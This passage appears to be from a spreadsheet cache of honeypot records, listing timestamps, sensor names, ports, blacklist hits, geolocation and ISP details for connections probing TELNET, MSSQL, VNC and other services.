    <s v="2001-02-10 19:29:01"/>
    <s v="2026-02-10 19:29:01"/>
    <s v="2025-01-20 09:14:25"/>
    <s v="['AUTH1.DNS.GXN.NET', 'AUTH2.DNS.GXN.NET', 'AUTH3.DNS.GXN.NET', 'AUTH4.DNS.GXN.NET']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:6daa:a881"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2175"/>
    <x v="2175"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T01:10:17"/>
    <d v="2025-04-12T01:09:49"/>
    <d v="2025-04-12T01:10:17"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Ourolândia"/>
    <s v="Ourolândia"/>
    <s v="3455690"/>
    <s v="NA"/>
    <s v="-10.9714"/>
    <s v="-41.0796"/>
    <s v="22085"/>
    <s v="Claro S/A"/>
    <s v="Claro S/A"/>
    <s v="cellular"/>
    <s v="Claro S/A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb18:b4e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2176"/>
    <x v="2176"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T01:09:27"/>
    <d v="2025-04-03T16:40:34"/>
    <d v="2025-04-12T01:09:27"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc79:925e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2177"/>
    <x v="2177"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T00:50:01"/>
    <d v="2025-04-12T00:50:01"/>
    <d v="2025-04-12T00:50:01"/>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3:d1da"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2178"/>
    <x v="2178"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T00:45:15"/>
    <d v="2025-04-12T00:45:15"/>
    <d v="2025-04-12T00:45:15"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:3405"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2179"/>
    <x v="2179"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T00:12:05"/>
    <d v="2024-03-05T15:43:00"/>
    <d v="2025-04-12T00:12:05"/>
    <n v="14436"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_IRC_H25&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;443&amp;&amp;5060&amp;&amp;24092&amp;&amp;443&amp;&amp;6667&amp;&amp;58850&amp;&amp;NA&amp;&amp;25758"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Dnipro rural raion"/>
    <s v="Dnipro"/>
    <s v="709930"/>
    <s v="NA"/>
    <s v="48.4647"/>
    <s v="35.0462"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:65dd"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2180"/>
    <x v="2180"/>
    <s v="061238219227.ctinets.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-12T00:10:26"/>
    <d v="2025-02-16T21:14:09"/>
    <d v="2025-04-12T00:10:26"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3dee:dbe3"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2181"/>
    <x v="2181"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T00:04:58"/>
    <d v="2025-04-12T00:04:58"/>
    <d v="2025-04-12T00:04:58"/>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Broadband Project2.2"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:bcd1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2182"/>
    <x v="2182"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T23:59:42"/>
    <d v="2025-04-11T23:59:42"/>
    <d v="2025-04-11T23:59:42"/>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1:fb31"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2183"/>
    <x v="2183"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T23:58:03"/>
    <d v="2025-04-11T23:56:54"/>
    <d v="2025-04-11T23:58:03"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Lamongan"/>
    <s v="Babat"/>
    <s v="1650888"/>
    <s v="NA"/>
    <s v="-7.11282"/>
    <s v="112.164"/>
    <s v="138886"/>
    <s v="PT Data Buana Nusantara"/>
    <s v="PT Data Buana Nusantara"/>
    <s v="business"/>
    <s v="PT Jaringan Buana Nusantara"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a3:24e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2184"/>
    <x v="2184"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T23:43:05"/>
    <d v="2025-04-11T22:49:28"/>
    <d v="2025-04-11T23:43:05"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:37ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2185"/>
    <x v="2185"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T23:39:00"/>
    <d v="2025-04-11T23:39:00"/>
    <d v="2025-04-11T23:39:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:ab9c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2186"/>
    <x v="2186"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T23:16:05"/>
    <d v="2025-04-11T23:16:05"/>
    <d v="2025-04-11T23:16:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="21"/>
    <s v="Diyarbakır Province"/>
    <s v="NA"/>
    <s v="Diyarbakır"/>
    <s v="316541"/>
    <s v="NA"/>
    <s v="37.925"/>
    <s v="40.211"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d52b:b1bd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2187"/>
    <x v="2187"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T22:27:04"/>
    <d v="2025-04-11T22:27:04"/>
    <d v="2025-04-11T22:27:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="27"/>
    <s v="Golestan"/>
    <s v="NA"/>
    <s v="Bandar-e Torkaman"/>
    <s v="141653"/>
    <s v="NA"/>
    <s v="36.9012"/>
    <s v="54.0719"/>
    <s v="58224"/>
    <s v="TCI"/>
    <s v="First"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5c8:9a00"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2188"/>
    <x v="2188"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T22:16:02"/>
    <d v="2025-04-10T19:57:19"/>
    <d v="2025-04-11T22:16:02"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hai Bà Trưng District"/>
    <s v="Hai BàTrưng"/>
    <s v="8616127"/>
    <s v="NA"/>
    <s v="21.0134"/>
    <s v="105.848"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7116:5510"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2189"/>
    <x v="2189"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T22:12:19"/>
    <d v="2025-04-11T05:07:35"/>
    <d v="2025-04-11T22:12:19"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;abuseipdb"/>
    <s v="5900&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="Sydney"/>
    <s v="Alexandria"/>
    <s v="2178136"/>
    <s v="2015"/>
    <s v="-33.9088"/>
    <s v="151.196"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="DigitalOcean, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d126:5ab5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2190"/>
    <x v="2190"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T22:10:44"/>
    <d v="2024-12-05T21:29:54"/>
    <d v="2025-04-11T22:10:44"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Belo Horizonte"/>
    <s v="Belo Horizonte"/>
    <s v="3470127"/>
    <s v="30000-000"/>
    <s v="-19.9191"/>
    <s v="-43.9387"/>
    <s v="271108"/>
    <s v="HBA TELECOM LTDA - ME"/>
    <s v="HBA TELECOM LTDA - ME"/>
    <s v="business"/>
    <s v="HBA TELECOM LTDA - ME"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de4:c957"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2191"/>
    <x v="2191"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T22:04:37"/>
    <d v="2025-04-11T22:04:37"/>
    <d v="2025-04-11T22:04:37"/>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3d03:ddd7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2192"/>
    <x v="2192"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:49:50"/>
    <d v="2025-04-11T21:46:12"/>
    <d v="2025-04-11T21:49:50"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="1080&amp;&amp;5432"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Phú Lộc District"/>
    <s v="Phú Lộc"/>
    <s v="1570496"/>
    <s v="NA"/>
    <s v="16.2803"/>
    <s v="107.859"/>
    <s v="24086"/>
    <s v="Viettel Corporation"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7467:22e2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2193"/>
    <x v="2193"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:40:56"/>
    <d v="2025-04-11T21:39:46"/>
    <d v="2025-04-11T21:40:56"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:4374"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2194"/>
    <x v="2194"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T21:27:53"/>
    <d v="2025-04-11T21:27:41"/>
    <d v="2025-04-11T21:27:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
